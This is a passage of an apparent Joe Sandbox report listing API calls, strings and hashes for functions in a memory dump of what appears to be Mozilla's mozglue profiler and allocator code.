                                                                  • Instruction Fuzzy Hash: 6AF09031614214CFDF009F69980439977F8AB4A36AF458219EE6593681DF307449D7E6
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EFB0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EFBD
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EFE1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EFF8
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F000
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F02F
                                                                    • Part of subcall function 6C09F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09F09B
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C09F0AC
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C09F0BE
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTimegetenv$ExclusiveLockProcessStampThreadV01@@Value@mozilla@@$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@__getpid
                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop$3JT/
                                                                  • API String ID: 2885066631-4081558766
                                                                  • Opcode ID: 36ce79f7a4482d3657589f82ba534321b092b79c5fc2eee8b8fa60f2eadf4ae2
                                                                  • Instruction ID: b67bbe0e9c55357a4c32d0958d132bd10fabec9e1860ca55366e427544b354e6
                                                                  • Opcode Fuzzy Hash: 36ce79f7a4482d3657589f82ba534321b092b79c5fc2eee8b8fa60f2eadf4ae2
                                                                  • Instruction Fuzzy Hash: 5EF0B431604215CFDF00DF65D804794B7FCEB4A31AF008119ED2543A81DF347448DBA6
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F350
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F35D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F381
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F398
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F3A0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F440
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F44D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F472
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F489
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F491
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F3CF
                                                                    • Part of subcall function 6C09F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09F09B
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C09F0AC
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C09F0BE
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F4A8
                                                                    • Part of subcall function 6C09F070: GetCurrentThreadId.KERNEL32 ref: 6C09F1E0
                                                                    • Part of subcall function 6C09F070: AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F1ED
                                                                    • Part of subcall function 6C09F070: ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F212
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F561
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F5A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentExclusiveLock$Thread$AcquireRelease$Time_getpidgetenv$?profiler_time@baseprofiler@mozilla@@ProcessStampV01@@Value@mozilla@@$Init_thread_footerNow@Stamp@mozilla@@TerminateV12@_
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling$3JT/
                                                                  • API String ID: 1973876441-259927438
                                                                  • Opcode ID: 36ce79f7a4482d3657589f82ba534321b092b79c5fc2eee8b8fa60f2eadf4ae2
                                                                  • Instruction ID: ef46d95ff9a5e9781d7b860170277c27889dd5350aa6bcecc33e05711643ccaa
                                                                  • Opcode Fuzzy Hash: 36ce79f7a4482d3657589f82ba534321b092b79c5fc2eee8b8fa60f2eadf4ae2
                                                                  • Instruction Fuzzy Hash: 42F09031604205CFDB009F65C8047A8B7F8EB4A31AF408219ED2543A81DF747448CBA6
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID: pl
                                                                  • API String ID: 3168844106-1767480541
                                                                  • Opcode ID: 4ea41178157dfb97601a9206d705e940434db1f9029242681ea2d31bd2256b5d
                                                                  • Instruction ID: 97039b62de23f8e409b3d3eb945422b9d08cc76a6e79769d57552f32c4e12c45
                                                                  • Opcode Fuzzy Hash: 4ea41178157dfb97601a9206d705e940434db1f9029242681ea2d31bd2256b5d
                                                                  • Instruction Fuzzy Hash: 35F08235206245DFCB109F15C404B69BBF6EB86B35F24461DEA6547FC1CB357482CE50
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                  • TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 2429186680-2186867486
                                                                  • Opcode ID: 4fc5faed6d26086554fde6d692e0747830355b6bea92cb94ccf784e0fddbb79a
                                                                  • Instruction ID: 3f389ae22715b9b678be4583dcfec7045f47570961c4fc04dda052e0b1dc71ac
                                                                  • Opcode Fuzzy Hash: 4fc5faed6d26086554fde6d692e0747830355b6bea92cb94ccf784e0fddbb79a
                                                                  • Instruction Fuzzy Hash: 87B092706043089BDB102BA8D80DB093B7CB709A01F000828AA0182241CFB9F1008E62
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C06237F
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C062B9C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: 4dbfd219e4a3c905381cd016a1a505a3597e0c5c2d4e54b9d79ea81a25f508f0
                                                                  • Instruction ID: a9ee15735a79d09cfbb36b286edc856c399943661551293c3e02bb99ad0d9659
                                                                  • Opcode Fuzzy Hash: 4dbfd219e4a3c905381cd016a1a505a3597e0c5c2d4e54b9d79ea81a25f508f0
                                                                  • Instruction Fuzzy Hash: A6E15F71A002069FDB18CF6AC894B9EBBF2FF88314F198169E9055BB45D771EC85CB90
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C0A8242,?,00000000,?,6C09B63F), ref: 6C0A9188
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0A8242,?,00000000,?,6C09B63F), ref: 6C0A91BB
                                                                  • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C0A8242,?,00000000,?,6C09B63F), ref: 6C0A91EB
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0A8242,?,00000000,?,6C09B63F), ref: 6C0A9200
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C0A8242,?,00000000,?,6C09B63F), ref: 6C0A9219
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$freememcpy
                                                                  • String ID:
                                                                  • API String ID: 4259248891-0
                                                                  • Opcode ID: efdd93f088c94798c50eb1d386ceef700fd971971925534a42ad017c8c1d74dd
                                                                  • Instruction ID: 965bff7cfcd99a8bc7b696d661af1316cfa4effdfbffb2c029d1a5f673fd6f8e
                                                                  • Opcode Fuzzy Hash: efdd93f088c94798c50eb1d386ceef700fd971971925534a42ad017c8c1d74dd
                                                                  • Instruction Fuzzy Hash: FE310031B006058BEB00DFE8DC4476A77E9EB81314F514629D856DB641EB32E806CBA1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C09DA31,00100000,?,?,00000000,?), ref: 6C0ACDA4
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                    • Part of subcall function 6C0AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C0ACDBA,00100000,?,00000000,?,6C09DA31,00100000,?,?,00000000,?), ref: 6C0AD158
                                                                    • Part of subcall function 6C0AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C0ACDBA,00100000,?,00000000,?,6C09DA31,00100000,?,?,00000000,?), ref: 6C0AD177
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C09DA31,00100000,?,?,00000000,?), ref: 6C0ACDC4
                                                                    • Part of subcall function 6C0A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C0B15FC,?,?,?,?,6C0B15FC,?), ref: 6C0A74EB
                                                                  • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C09DA31,00100000,?,?,00000000,?), ref: 6C0ACECC
                                                                    • Part of subcall function 6C06CA10: mozalloc_abort.MOZGLUE(?), ref: 6C06CAA2
                                                                    • Part of subcall function 6C09CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C0ACEEA,?,?,?,?,00000000,?,6C09DA31,00100000,?,?,00000000), ref: 6C09CB57
                                                                    • Part of subcall function 6C09CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C09CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C0ACEEA,?,?), ref: 6C09CBAF
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C09DA31,00100000,?,?,00000000,?), ref: 6C0AD058
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                  • String ID:
                                                                  • API String ID: 861561044-0
                                                                  • Opcode ID: 30b66fd8f1d490849a5db439518a10ef194ef622b94f19bc9be7831f218bd2b6
                                                                  • Instruction ID: 2b370775f2ced7a3551bde96d27008a3c5c2d2c70aa67d5e36441a86b3c5777c
                                                                  • Opcode Fuzzy Hash: 30b66fd8f1d490849a5db439518a10ef194ef622b94f19bc9be7831f218bd2b6
                                                                  • Instruction Fuzzy Hash: 66D16F71A04B569FD708CF68C480B99F7E1BF89308F05862DD8598B712EB31B9A5CB81
                                                                  APIs
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,6C069D70,?,?,?), ref: 6C05748D
                                                                  • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,?,?,?,?,?,?,?,?,?,00000000,?,6C069D70,?,?), ref: 6C057499
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,6C069D70,?,?,?,00000000), ref: 6C0575CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$calloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3095843317-2178588373
                                                                  • Opcode ID: a0202056c4a98f5a411dea5e2ca745751e297fc97d952396eefdde2bdf5b7561
                                                                  • Instruction ID: d965080357057b5318d32766b6689b2228e95fcf9924a0f0f9c65ec1b274f49f
                                                                  • Opcode Fuzzy Hash: a0202056c4a98f5a411dea5e2ca745751e297fc97d952396eefdde2bdf5b7561
                                                                  • Instruction Fuzzy Hash: 4691A3B1A14A029FD708CF3CC981B56B7F5FF45308F848629D9198BA82E730F865DB91
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C09501B
                                                                  • memcpy.VCRUNTIME140(?,?,00000200), ref: 6C09515B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpystrlen
                                                                  • String ID: ...$3JT/
                                                                  • API String ID: 3412268980-3309326952
                                                                  • Opcode ID: 7b3cec25bc9dfcbb012f579bc1da0073c93e03f0921235ff03398a4c33df0f84
                                                                  • Instruction ID: c715cb59c534da2a1b85c1481dcde87c42f3fdc90721d3901b07592f57154026
                                                                  • Opcode Fuzzy Hash: 7b3cec25bc9dfcbb012f579bc1da0073c93e03f0921235ff03398a4c33df0f84
                                                                  • Instruction Fuzzy Hash: 4A616B70A083469FCB00CF19D580B4BBBE1AF9930CF048A6DE99997751E731E919CB93
                                                                  APIs
                                                                  • GetTickCount64.KERNEL32 ref: 6C075D40
                                                                  • EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C075D67
                                                                  • __aulldiv.LIBCMT ref: 6C075DB4
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C075DED
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                  • String ID:
                                                                  • API String ID: 557828605-0
                                                                  • Opcode ID: ba7cfb533767c2a1575cc9c118c9641f8aaeac8a4222a3b7874bb1a347069437
                                                                  • Instruction ID: 7c8c07108a4da5abba8db51dd00c97a8143fdf6ae219b7f53d08318887f83382
                                                                  • Opcode Fuzzy Hash: ba7cfb533767c2a1575cc9c118c9641f8aaeac8a4222a3b7874bb1a347069437
                                                                  • Instruction Fuzzy Hash: BD514975E002198FCF18CE68C954BAEBBFAFB89304F198619D815A7B90CB707D45CB90
                                                                  APIs
                                                                  • GetTickCount64.KERNEL32 ref: 6C0B7250
                                                                  • EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C0B7277
                                                                  • __aulldiv.LIBCMT ref: 6C0B72C4
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C0B72F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                  • String ID:
                                                                  • API String ID: 557828605-0
                                                                  • Opcode ID: f8a4a71b7314d451a4f42501c7f87acd0e13560c23401d740f42688a5f1c4f37
                                                                  • Instruction ID: a011f8461bf3b88b76e77401d4eecc43afc51582d77ce0a4c5217cc9f2f1bcb2
                                                                  • Opcode Fuzzy Hash: f8a4a71b7314d451a4f42501c7f87acd0e13560c23401d740f42688a5f1c4f37
                                                                  • Instruction Fuzzy Hash: C3510B71E001298FCF08CFA8C851AAEB7B9FB89714F198629ED15B7B50CB317945CB90
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC), ref: 6C064C2F
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7DC), ref: 6C064C82
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC), ref: 6C064C89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Enter$Leave
                                                                  • String ID: GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$MOZ_RELEASE_ASSERT(mNode)$[I %d/%d] - MOZ_PROFILER_STARTUP is set$3JT/
                                                                  • API String ID: 2801635615-1265232897
                                                                  • Opcode ID: d407b3071a9cd88107b7fbd7dc912956ba2fc2c739ced93da77162e8d81bf91b
                                                                  • Instruction ID: 1ee9944e4c1108f6e1705803edc2634e36f2d4747167df402fe30e5eed3b0ed3
                                                                  • Opcode Fuzzy Hash: d407b3071a9cd88107b7fbd7dc912956ba2fc2c739ced93da77162e8d81bf91b
                                                                  • Instruction Fuzzy Hash: FE41A2317053119BDB08CF6AC5A071A77E1AF86738F29861CE8758BED1CF30E8458B81
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C090B66
                                                                  • EnterCriticalSection.KERNEL32(6C0DE744), ref: 6C090B8D
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE744), ref: 6C090BC4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavememset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 759993129-2178588373
                                                                  • Opcode ID: 9650633641765b6f04f98ddd3514722f54d400ff98e68045ce5092de3dad8c37
                                                                  • Instruction ID: bc6c0370a5f5191c0e49aedc4a08a94ad26119bb2998662a6a617945330683ba
                                                                  • Opcode Fuzzy Hash: 9650633641765b6f04f98ddd3514722f54d400ff98e68045ce5092de3dad8c37
                                                                  • Instruction Fuzzy Hash: 28210A317056104BCB08CA28D895B6E73E5AFCE32CF15426DE9268BB94DB70EC04DA94
